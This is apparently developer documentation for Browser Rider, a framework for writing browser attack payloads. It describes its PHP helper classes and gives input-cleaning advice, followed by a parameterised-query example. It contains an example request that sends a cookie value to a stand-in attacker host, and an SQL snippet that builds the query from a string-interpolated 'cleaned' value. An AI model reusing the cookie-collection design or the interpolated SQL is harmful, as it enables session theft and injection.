Browser Rider Framework
From Engineering For Fun
Smarty - Template Engine
Although Smarty is known as a "Template Engine", it would be more accurately described as a "Template/Presentation Framework." That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress the word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth.
Smarty is used in Browser Rider to generate the templates and the payloads. It lets us write very clear and flexible payloads. If you are planning to program your own payloads and are not familiar with Smarty, refer to this website: http://www.smarty.net/
Browser Rider's framework
When you write code for Browser Rider, the framework offers a collection of classes and functions that simplify the coding and integrate your code into the tool.
PHP Class: ControlModule
This class gives access to the session and the HTTP requests.

```php
class ControlModule extends ROOTModule
{
    protected $http;    // manages the HTTP requests (GET and POST)
    protected $session; // manages the user session

    public function __construct()
    {
        parent::__construct();
        $this->http = HTTPRequest::getInstance();
        $this->session = SessionObject::getInstance();
    }
}
```
PHP Class: HTTPRequest class
Manages all the HTTP requests. Offers you the methods:
| Method | Description | Example |
|---|---|---|
| `static public function getInstance()` | Returns the instance of the class HTTPRequest. | `$this->http = HTTPRequest::getInstance();` |
| `public function getVar($varname,$method=false)` | Retrieves a variable in $_GET and $_POST. | `$this->http->getVar('ip'); // GET`<br>`$this->http->getVar('data', 'post'); // POST` |
| `public function getCleanString($varname,$method=false)` | Retrieves a variable (string) sent in an HTTP request and cleans it. | `$data = $this->http->getCleanString('data');` |
| `public function getCleanInteger($varname,$method=false)` | Retrieves an integer and cleans it. | `$this->http->getCleanInteger('id');` |
| `public function redirect($url)` | Redirects to a URL. | `$this->http->redirect('index.php');` |
| `public function getIPAddress()` | Returns the IP address of the person. | `$ip = $this->http->getIPAddress();` |
| `public function getHttpReferer()` | Returns the referrer of the person. | `$referer = $this->http->getHttpReferer();` |
PHP Class: SessionObject class
Manages the Session. Provides you with the functions:
| Method | Description | Example |
|---|---|---|
| `static public function getInstance()` | Returns the instance of the class SessionObject. | `$this->session = SessionObject::getInstance();` |
| `public function __set($name,$value)` | Sets a variable in the session. | `$this->session->username = 'benjamin';` |
| `public function __get($name)` | Gets a variable in the session. | `$username = $this->session->username;` |
| `public function __unset($name)` | Unsets a variable in the session. | `unset($this->session->username);` |
| `public function loginUser($username,$password)` | Tries to log the user in to Browser Rider. | `$this->session->loginUser('hacker', 'hacker');` |
| `public function isLoggedIn()` | Returns true if the user is logged in, false if not. | `if($this->session->isLoggedIn()) { ... } else die("not logged in");` |
PHP Class: Database
This class implements the singleton design pattern. It adds a layer between PHP's database functions and Browser Rider. In the future this will allow us to make Browser Rider compatible with many DBMS.
This class provides you the following methods:
- getInstance() gets the instance of the class (singleton)
- query($query) Execute an SQL Query
- fetchResult($result,$row,$field=null) Retrieves the contents of one cell
- fetchAssoc($result) Fetch a result row as an associative array
- fetchRow($result) Get a result row as an enumerated array
- numRows($result) Get number of rows in result
- affectedRows($result) Get number of affected rows in previous SQL operation
- dieError($file, $line) Returns the text of the error message from previous SQL operation
- disconnect() Closes the connection
JSMin
JSMin is a filter which removes comments and unnecessary whitespace from JavaScript files. It typically reduces filesize by half, resulting in faster downloads. It also encourages a more expressive programming style because it eliminates the download cost of clean, literate self-documentation.
You can get JSMin as a standalone for PHP here.
Browser Rider uses JSMin automatically on payloads that are not obfuscated in order to reduce their size.
Security
ANTIBUG Constant
When you code in Browser Rider, try to put the following code at the top of each of your PHP scripts:

```php
if(!defined('ANTIBUG')) exit;
```

It protects against a stupid full path disclosure if the script is accessed manually: the script exits before any code that could raise a path-revealing error runs.
Protect against XSS & common SQL injections
When writing your payloads you should use the function getCleanString($varname,$method=false) in the HTTPRequest class. This function gathers a string sent to the tool and cleans it before it is used by any script.

To use this function, your payload should normally extend PayloadModule, which extends ControlModule, which has an attribute http that is an instance of the class HTTPRequest. So you can simply write:

```php
// Cleaned copy of the "cookie" request variable
$cookie = $this->http->getCleanString('cookie');
echo $cookie;
$SQL = "INSERT INTO table (cookie) VALUE ('$cookie')";
```

With a request such as the following, the value is cleaned before it reaches the echo and the query:

http://www.evilsite.com/BrowserRider/attack.js?cookie=somevalue<script>[XSS attack]</script>'[SQLi attack]

It should protect you against cross-site scripting attacks and common SQL injection attacks.
If you are retrieving an integer, HTTPRequest provides you with the secure function getCleanInteger($varname,$method=false), which works the same way.
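The cookie snippet above, handled per context instead of by a single cleaning step, as an added example that is not Browser Rider's own code: the value is bound as a query parameter, encoded only when it is written into HTML, and ids are parsed strictly. PDO with an in-memory SQLite database stands in for the framework's Database class, and the `cookies` table and all function names are assumptions.

```php
<?php
// Added example, not Browser Rider code. PDO with in-memory SQLite stands in
// for the framework's Database class; the table name "cookies" is hypothetical.

/** Store an untrusted value with a bound parameter, never string interpolation. */
function storeCookie(PDO $db, string $cookie): int
{
    $stmt = $db->prepare('INSERT INTO cookies (cookie) VALUES (:cookie)');
    $stmt->execute([':cookie' => $cookie]);
    return (int) $db->lastInsertId();
}

/** Strict integer parsing for ids: rejects "12abc", "" and values below 1. */
function parseId($input): ?int
{
    $id = filter_var($input, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Read the value back and encode it for an HTML text or attribute context. */
function renderCookie(PDO $db, int $id): string
{
    $stmt = $db->prepare('SELECT cookie FROM cookies WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $value = $stmt->fetchColumn();
    if ($value === false) {
        return ''; // unknown id: render nothing
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cookies (id INTEGER PRIMARY KEY, cookie TEXT NOT NULL)');

// Constructed input: the query-string value from the URL shown above.
$raw = "somevalue<script>[XSS attack]</script>'[SQLi attack]";
$id  = storeCookie($db, $raw);

// The quote stays data: exactly one row exists and it holds the raw value.
$rows = $db->query('SELECT cookie FROM cookies')->fetchAll(PDO::FETCH_COLUMN);
var_dump($rows === [$raw]);

// Ids taken from a request are parsed strictly before use.
var_dump(parseId('12abc'), parseId((string) $id));

// On output the markup is rendered as text, not as a script element.
echo renderCookie($db, $id), PHP_EOL;
```

Because the stored value is kept verbatim and encoded only at output time, the same row can later be written safely into other contexts (JSON, a log line) with the encoder that fits each one.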
